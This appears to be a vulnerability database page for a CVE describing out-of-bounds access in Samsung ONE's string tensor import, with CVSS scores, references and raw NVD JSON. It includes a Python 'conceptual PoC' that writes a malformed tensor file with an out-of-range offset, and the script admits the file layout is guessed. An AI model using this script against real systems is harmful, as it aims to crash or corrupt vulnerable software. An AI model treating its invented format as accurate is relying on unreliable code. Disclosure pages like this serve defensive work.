CVE-2026-6839

Description

Improper validation of STRING tensor offsets could allows malformed string metadata to trigger out of bounds access during constant tensor import in Samsung Open Source ONE Affected version is prior to commit 1.30.0.

CVSS Details

CVSS Score

6.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:samsung:one:*:*:*:*:*:*:*:* - VULNERABLE

Samsung Open Source ONE < commit 1.30.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC for triggering the OOB access
import struct

# This is a simplified representation of how one might craft a malformed tensor buffer.
# Actual exploitation would depend on the specific file format of Samsung ONE.

def create_malformed_tensor():
    # Header: Version (4 bytes), Count (4 bytes)
    header = struct.pack('<II', 1, 1)
    
    # Metadata: Type STRING, Size
    # Simulating a string tensor with invalid offset
    # Normal offset would point within the buffer, here we point outside
    buffer_size = 100
    malformed_offset = buffer_size + 1000  # Out of bounds offset
    
    # Constructing the metadata block (simplified)
    metadata = struct.pack('<I', 4) # Type 4 = STRING
    metadata += struct.pack('<Q', malformed_offset) # Offset
    metadata += struct.pack('<Q', 10) # Length
    
    # The payload (actual data is less relevant if the check fails on offset)
    payload = b'A' * 50
    
    return header + metadata + payload

# Save to file (simulated)
with open('malformed_one_tensor.bin', 'wb') as f:
    f.write(create_malformed_tensor())

print("Malformed tensor file generated. Loading this in vulnerable ONE versions may trigger OOB access.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6839
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6839
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6839/
[4] VulDB https://vuldb.com/cve/CVE-2026-6839
[5] https://github.com/Samsung/ONE/pull/16481

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6839", "sourceIdentifier": "[email protected]", "published": "2026-04-22T07:16:14.957", "lastModified": "2026-04-27T18:22:02.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper validation of STRING tensor offsets could allows malformed string metadata to trigger out of bounds access during constant tensor import in Samsung Open Source ONE\nAffected version is prior to commit 1.30.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:one:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.30.0", "matchCriteriaId": "4DBBA2E4-036F-40C0-B2EF-D14AB3C83B6E"}]}]}], "references": [{"url": "https://github.com/Samsung/ONE/pull/16481", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}